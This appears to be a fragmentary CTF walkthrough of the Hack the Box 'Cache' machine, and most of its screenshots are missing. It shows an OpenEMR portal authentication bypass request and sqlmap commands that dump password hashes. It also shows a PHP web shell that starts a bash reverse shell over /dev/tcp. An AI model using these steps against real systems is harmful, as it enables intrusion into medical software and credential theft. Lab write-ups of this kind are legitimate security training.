Hack the Box: Cache



Nmap scan
Main site
login page
Credentials in js file
OpenEMR login page
OpenEMR version
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating tothe registration page and modifying the requested url to access the desired page.
# cat request 
GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=hr2livsbd5ai8c5cmglpme60fi; PHPSESSID=47et9rbfja72qos57se81ea8ha
Upgrade-Insecure-Requests: 1
# sqlmap -r request --tables -v0
| users_facility |
| users_secure |
# sqlmap -r request --dump -T users_secure
password hash to openmr_admin
reversing the password
Admin interface
Listable /sites
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'\"); ?>" > /var/www/hms.htb/public_html/sites/tellico.php
Reverse shell
User flag


Netstat result
Listing content of memcached
Reading luffy credentials
Move to luffy
Listing local docker images
Root flagcd



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store